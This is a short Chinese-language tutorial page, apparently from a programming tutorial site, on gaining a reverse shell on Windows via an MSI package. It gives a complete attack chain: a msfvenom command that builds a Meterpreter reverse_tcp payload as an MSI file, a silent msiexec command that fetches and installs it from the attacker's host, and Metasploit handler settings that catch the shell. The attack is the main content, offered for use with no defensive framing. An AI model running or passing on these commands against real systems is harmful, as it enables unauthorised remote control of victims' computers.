使用 MSI 軟體包獲取反向 Shell
Windows 作業系統已安裝 Windows 安裝程式引擎,MSI 軟體包使用此引擎來安裝應用程式。解釋軟體包和安裝產品的可執行程式是 Msiexec.exe。
透過 msfvenom 啟動 msiexec 攻擊
讓我們使用 Windows Meterpreter 載荷生成一個 MSI 軟體包檔案 (1.msi),如下所示;
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi
在目標端,當受害者在遠端計算機上執行 1.msi 檔案時,使用以下實用程式;
msiexec /q /i http://192.168.1.109/1.msi
攻擊者透過啟動 multi/handler 作為監聽器,從而獲得受害者計算機的反向 shell。
- use exploit/multi/handler
- set pyaload windows/meterpreter/reverse_tcp
- set lhost 192.168.1.109
- exploit

廣告
資料結構
網路
RDBMS
作業系統
Java
iOS
HTML
CSS
Android
Python
C 程式設計
C++
C#
MongoDB
MySQL
Javascript
PHP